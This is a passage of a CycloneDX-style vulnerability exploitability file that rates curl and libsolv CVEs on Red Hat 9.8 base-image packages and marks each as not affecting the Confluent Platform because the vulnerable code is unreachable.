          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8925",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        415
      ],
      "description": "The curl logic that works with SASL authentication could end up cleaning up\nthe GSASL context *twice* without clearing the pointer in between, making it\n`free()` the same pointer twice.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8925"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8925"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8925.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8925.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8925.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-p8x5-c6c9-8cwx"
        },
        {
          "url": "https://hackerone.com/reports/3735193"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8925"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8925"
        }
      ],
      "published": "2026-07-03T07:16:24+00:00",
      "updated": "2026-07-07T23:04:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8926",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        522
      ],
      "description": "When asking curl to use a `.netrc` file to find credentials and at the same\ntime specifying a URL with a username(without a password), like\n`https://user@example.com/`, curl could wrongly get and use the password for\n*another* user set in the `.netrc` file for that host if such a one exists and\nthere is no match for the specified user.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8926"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8926"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8926.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8926.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8926.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-vw2x-3w8j-rq82"
        },
        {
          "url": "https://hackerone.com/reports/3735184"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8926"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8926"
        }
      ],
      "published": "2026-07-03T07:16:25+00:00",
      "updated": "2026-07-07T23:02:54+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-9149",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "A flaw was found in libsolv. This heap buffer overflow vulnerability occurs when a victim processes a specially crafted `.solv` file containing negative size values in the `repo_add_solv` function. This leads to an undersized memory allocation and a subsequent out-of-bounds write. An attacker could exploit this to cause a denial of service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-9149"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:21333"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28236"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-9149"
        },
        {
          "url": "https://bugzilla.redhat.com/2460379"
        },
        {
          "url": "https://bugzilla.redhat.com/2460380"
        },
        {
          "url": "https://bugzilla.redhat.com/2460425"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460425"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-48864"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9149"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9150"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-28236.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28236"
        },
        {
          "url": "https://github.com/openSUSE/libsolv/pull/617"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-9149.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-28236.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9149"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-9149"
        }
      ],
      "published": "2026-05-21T00:16:35+00:00",
      "updated": "2026-07-31T18:17:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.7.24-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
